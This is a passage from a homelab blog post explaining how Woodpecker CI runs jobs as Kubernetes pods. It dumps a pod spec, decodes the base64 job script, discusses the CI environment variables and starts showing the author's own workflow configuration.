</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#39;[&#34;.woodpecker/my-first-workflow.yaml&#34;]&#39;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PIPELINE_FINISHED</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;1736888960&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PIPELINE_FORGE_URL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">https://gitea.example.com/adm/ci-tests/commit/353b9f67102ba120ffe9284aa711eb87c2542573</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PIPELINE_NUMBER</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;3&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PIPELINE_PARENT</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;0&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PIPELINE_STARTED</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;1736888951&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PIPELINE_STATUS</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">success</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PIPELINE_URL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">https://ci.example.com/repos/1/pipeline/3</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_COMMIT_AUTHOR</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">mmeier</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_COMMIT_AUTHOR_AVATAR</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">https://gitea.example.com/avatars/d941e68cc8aa38efdee91c3e3c97159e</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_COMMIT_AUTHOR_EMAIL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">mmeier@noreply.gitea.example.com</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_COMMIT_BRANCH</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">master</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_COMMIT_MESSAGE</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Possibly fix permission error</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_COMMIT_REF</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">refs/heads/master</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_COMMIT_SHA</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">b680ab9b9a7aa300d80a43bd389de0e57f767e4f</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_COMMIT_URL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">https://gitea.example.com/adm/ci-tests/commit/b680ab9b9a7aa300d80a43bd389de0e57f767e4f</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_PIPELINE_CREATED</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;1736800786&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_PIPELINE_EVENT</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">push</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_PIPELINE_FINISHED</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;1736800827&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_PIPELINE_FORGE_URL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">https://gitea.example.com/adm/ci-tests/commit/b680ab9b9a7aa300d80a43bd389de0e57f767e4f</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_PIPELINE_NUMBER</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;2&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_PIPELINE_PARENT</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;0&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_PIPELINE_STARTED</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;1736800790&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_PIPELINE_STATUS</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">failure</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_PIPELINE_URL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">https://ci.example.com/repos/1/pipeline/2</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_REPO</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">adm/ci-tests</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_REPO_CLONE_SSH_URL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">ssh://gituser@git.example.com:1234/adm/ci-tests.git</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_REPO_CLONE_URL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">https://gitea.example.com/adm/ci-tests.git</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_REPO_DEFAULT_BRANCH</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">master</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_REPO_NAME</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">ci-tests</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_REPO_OWNER</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">adm</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_REPO_PRIVATE</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_REPO_REMOTE_ID</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;94&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_REPO_SCM</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">git</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_REPO_TRUSTED</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;false&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_REPO_URL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">https://gitea.example.com/adm/ci-tests</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_STEP_FINISHED</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;1736888960&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_STEP_NUMBER</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;0&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_STEP_STARTED</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;1736888951&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_STEP_STATUS</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">success</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_STEP_URL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">https://ci.example.com/repos/1/pipeline/3</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_SYSTEM_HOST</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">ci.example.com</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_SYSTEM_NAME</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_SYSTEM_PLATFORM</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">linux/amd64</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_SYSTEM_URL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">https://ci.example.com</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_SYSTEM_VERSION</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">2.8.1</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_WORKFLOW_NAME</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">my-first-workflow</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_WORKFLOW_NUMBER</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;1&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_WORKSPACE</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">/woodpecker/src/gitea.example.com/adm/ci-tests</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">HOME</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">/root</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_SCRIPT</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">CmlmIFsgLW4gIiRDSV9ORVRSQ19NQUNISU5FIiBdOyB0aGVuCmNhdCA8PEVPRiA+ICRIT01FLy5uZXRyYwptYWNoaW5lICRDSV9ORVRSQ19NQUNISU5FCmxvZ2luICRDSV9ORVRSQ19VU0VSTkFNRQpwYXNzd29yZCAkQ0lfTkVUUkNfUEFTU1dPUkQKRU9GCmNobW9kIDA2MDAgJEhPTUUvLm5ldHJjCmZpCnVuc2V0IENJX05FVFJDX1VTRVJOQU1FCnVuc2V0IENJX05FVFJDX1BBU1NXT1JECnVuc2V0IENJX1NDUklQVAoKZWNobyArICdlY2hvICJUaGlzIGlzIHRoZSBidWlsZCBzdGVwIicKZWNobyAiVGhpcyBpcyB0aGUgYnVpbGQgc3RlcCIKCmVjaG8gKyAnZWNobyAiYmluYXJ5LWRhdGEtMTIzIiA+IGV4ZWN1dGFibGUnCmVjaG8gImJpbmFyeS1kYXRhLTEyMyIgPiBleGVjdXRhYmxlCgplY2hvICsgJ2NobW9kIHUreCAuL2V4ZWN1dGFibGUnCmNobW9kIHUreCAuL2V4ZWN1dGFibGUKCmVjaG8gKyAnc2xlZXAgMTIwJwpzbGVlcCAxMjAK</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">SHELL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">/bin/sh</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">debian</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">imagePullPolicy</span>: <span style="color:#ae81ff">Always</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wp-01jhkac6pf4jyfywavjg6be5cq</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>: {}
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">terminationMessagePath</span>: <span style="color:#ae81ff">/dev/termination-log</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">terminationMessagePolicy</span>: <span style="color:#ae81ff">File</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/woodpecker</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wp-01jhkac6pf4jyfywavjasgpcwn-0-default</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/var/run/secrets/kubernetes.io/serviceaccount</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-api-access-n75dj</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">workingDir</span>: <span style="color:#ae81ff">/woodpecker/src/gitea.example.com/adm/ci-tests</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dnsPolicy</span>: <span style="color:#ae81ff">ClusterFirst</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enableServiceLinks</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">imagePullSecrets</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">regcred</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">nodeName</span>: <span style="color:#ae81ff">sehith</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kubernetes.io/arch</span>: <span style="color:#ae81ff">amd64</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">preemptionPolicy</span>: <span style="color:#ae81ff">PreemptLowerPriority</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">priority</span>: <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">restartPolicy</span>: <span style="color:#ae81ff">Never</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">schedulerName</span>: <span style="color:#ae81ff">default-scheduler</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">securityContext</span>: {}
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceAccount</span>: <span style="color:#ae81ff">default</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceAccountName</span>: <span style="color:#ae81ff">default</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">terminationGracePeriodSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tolerations</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">effect</span>: <span style="color:#ae81ff">NoExecute</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">key</span>: <span style="color:#ae81ff">node.kubernetes.io/not-ready</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">Exists</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">tolerationSeconds</span>: <span style="color:#ae81ff">300</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">effect</span>: <span style="color:#ae81ff">NoExecute</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">key</span>: <span style="color:#ae81ff">node.kubernetes.io/unreachable</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">Exists</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">tolerationSeconds</span>: <span style="color:#ae81ff">300</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wp-01jhkac6pf4jyfywavjasgpcwn-0-default</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">persistentVolumeClaim</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">claimName</span>: <span style="color:#ae81ff">wp-01jhkac6pf4jyfywavjasgpcwn-0-default</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-api-access-n75dj</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">projected</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">defaultMode</span>: <span style="color:#ae81ff">420</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">sources</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">serviceAccountToken</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">expirationSeconds</span>: <span style="color:#ae81ff">3607</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">path</span>: <span style="color:#ae81ff">token</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">items</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">key</span>: <span style="color:#ae81ff">ca.crt</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">path</span>: <span style="color:#ae81ff">ca.crt</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-root-ca.crt</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">downwardAPI</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">items</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">fieldRef</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">fieldPath</span>: <span style="color:#ae81ff">metadata.namespace</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">path</span>: <span style="color:#ae81ff">namespace</span>
</span></span></code></pre></div><p>There are a number of noteworthy things in here. First, perhaps, the handling of
the script to execute for the job:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  - <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">/bin/sh</span>
</span></span><span style="display:flex;"><span>    - -<span style="color:#ae81ff">c</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">echo $CI_SCRIPT | base64 -d | /bin/sh -e</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_SCRIPT</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">CmlmIFsgLW4gIiRDSV9ORVRSQ19NQUNISU5FIiBdOyB0aGVuCmNhdCA8PEVPRiA+ICRIT01FLy5uZXRyYwptYWNoaW5lICRDSV9ORVRSQ19NQUNISU5FCmxvZ2luICRDSV9ORVRSQ19VU0VSTkFNRQpwYXNzd29yZCAkQ0lfTkVUUkNfUEFTU1dPUkQKRU9GCmNobW9kIDA2MDAgJEhPTUUvLm5ldHJjCmZpCnVuc2V0IENJX05FVFJDX1VTRVJOQU1FCnVuc2V0IENJX05FVFJDX1BBU1NXT1JECnVuc2V0IENJX1NDUklQVAoKZWNobyArICdlY2hvICJUaGlzIGlzIHRoZSBidWlsZCBzdGVwIicKZWNobyAiVGhpcyBpcyB0aGUgYnVpbGQgc3RlcCIKCmVjaG8gKyAnZWNobyAiYmluYXJ5LWRhdGEtMTIzIiA+IGV4ZWN1dGFibGUnCmVjaG8gImJpbmFyeS1kYXRhLTEyMyIgPiBleGVjdXRhYmxlCgplY2hvICsgJ2NobW9kIHUreCAuL2V4ZWN1dGFibGUnCmNobW9kIHUreCAuL2V4ZWN1dGFibGUKCmVjaG8gKyAnc2xlZXAgMTIwJwpzbGVlcCAxMjAK</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">SHELL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">/bin/sh</span>
</span></span></code></pre></div><p>Running the <code>CI_SCRIPT</code> content through <code>base64 -d</code> results in this shell script:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> -n <span style="color:#e6db74">&#34;</span>$CI_NETRC_MACHINE<span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>cat <span style="color:#e6db74">&lt;&lt;EOF &gt; $HOME/.netrc
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">machine $CI_NETRC_MACHINE
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">login $CI_NETRC_USERNAME
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">password $CI_NETRC_PASSWORD
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">EOF</span>
</span></span><span style="display:flex;"><span>chmod <span style="color:#ae81ff">0600</span> $HOME/.netrc
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>unset CI_NETRC_USERNAME
</span></span><span style="display:flex;"><span>unset CI_NETRC_PASSWORD
</span></span><span style="display:flex;"><span>unset CI_SCRIPT
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>echo + <span style="color:#e6db74">&#39;echo &#34;This is the build step&#34;&#39;</span>
</span></span><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;This is the build step&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>echo + <span style="color:#e6db74">&#39;echo &#34;binary-data-123&#34; &gt; executable&#39;</span>
</span></span><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;binary-data-123&#34;</span> &gt; executable
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>echo + <span style="color:#e6db74">&#39;chmod u+x ./executable&#39;</span>
</span></span><span style="display:flex;"><span>chmod u+x ./executable
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>echo + <span style="color:#e6db74">&#39;sleep 120&#39;</span>
</span></span><span style="display:flex;"><span>sleep <span style="color:#ae81ff">120</span>
</span></span></code></pre></div><p>This shows how the commands from the <code>commands:</code> list of the <code>step</code> object
in the Woodpecker file are converted into a shell script: each command is copied
into the script, preceded by an <code>echo</code> that prints it.</p>
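<p>For reference, the workflow file that produced this particular script presumably
looked something like the following. This is just my reconstruction from the decoded
commands, not the actual file, and the step name is a guess:</p>
<pre tabindex="0"><code>steps:
  - name: build
    image: debian
    commands:
      - echo &#34;This is the build step&#34;
      - echo &#34;binary-data-123&#34; &gt; executable
      - chmod u+x ./executable
      - sleep 120
</code></pre>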
<p>Looking at this and thinking about my own work on a large CI, I sometimes
wonder what we&rsquo;d do without the <code>base64</code> command. &#x1f605;</p>
<p>Another aspect of the setup is the wealth of available environment variables,
supplying a lot of information not just on the commit currently being tested,
but also on the previous one. Most of the <code>CI_</code> variables also have equivalents
prefixed with <code>DRONE_</code>, for backwards compatibility. I removed those from the
output above to keep the snippet from getting even longer.</p>
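<p>Since all of these variables are just ordinary environment variables inside the
step container, they can be used directly in commands. A purely hypothetical
debugging step might look like this:</p>
<pre tabindex="0"><code>steps:
  - name: show pipeline info
    image: alpine
    commands:
      - echo &#34;Pipeline $CI_PIPELINE_NUMBER for $CI_REPO, triggered by a $CI_PIPELINE_EVENT event&#34;
      - echo &#34;Commit branch is $CI_COMMIT_BRANCH&#34;
</code></pre>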
<p>Finally, there&rsquo;s proof of what I said above about the agent&rsquo;s architecture. This
pipeline was run by the agent on my AMD64 node, resulting in the NodeSelector for
AMD64 nodes:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  <span style="color:#f92672">nodeName</span>: <span style="color:#ae81ff">sehith</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kubernetes.io/arch</span>: <span style="color:#ae81ff">amd64</span>
</span></span></code></pre></div><p>It&rsquo;s also nice to see that the Pod was running on <code>sehith</code>, which isn&rsquo;t the node the
agent ran on. This shows that the Pods are simply submitted to k8s for scheduling
and can then run on any (in this case AMD64) node.</p>
<p>Before ending the post, let&rsquo;s have a look at some example CI configurations.</p>
<h2 id="ci-configurations">CI configurations</h2>
<p>Each repository using Woodpecker needs to be enabled. This is done from
Woodpecker&rsquo;s web UI:
<figure>
    <img loading="lazy" src="enable_repo.png"
         alt="A screenshot of Woodpecker&#39;s repo enabling UI. It shows a search field at the top and a list of repositories at the bottom. Some of them have a label saying &#39;Already enabled&#39;, while others have an &#39;Enable&#39; button next to them."/> <figcaption>
            <p>Woodpecker&rsquo;s repo addition UI.</p>
        </figcaption>
</figure>

When clicking the <em>Enable</em> button, Woodpecker will contact Gitea and add a
webhook configuration for the repository. From then on, Gitea will call the
webhook for relevant events, passing along information about the event which
triggered it and the state of the repository.</p>
<p>The Woodpecker configuration files for a specific repository are expected in
the <code>.woodpecker/</code> directory at the repository root by default.</p>
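<p>Each YAML file in that directory defines one workflow, so a repository with several
independent pipelines might be laid out like this (the file names are just examples):</p>
<pre tabindex="0"><code>.woodpecker/
  blog.yaml
  hugo.yaml
</code></pre>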
<h3 id="blog-repo-example">Blog repo example</h3>
<p>Here&rsquo;s the configuration I&rsquo;m using to build and publish this blog:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">event</span>: <span style="color:#ae81ff">push</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">steps</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Hugo Site Build</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#e6db74">&#34;harbor.mei-home.net/homelab/hugo:0.125.4-r3&#34;</span>
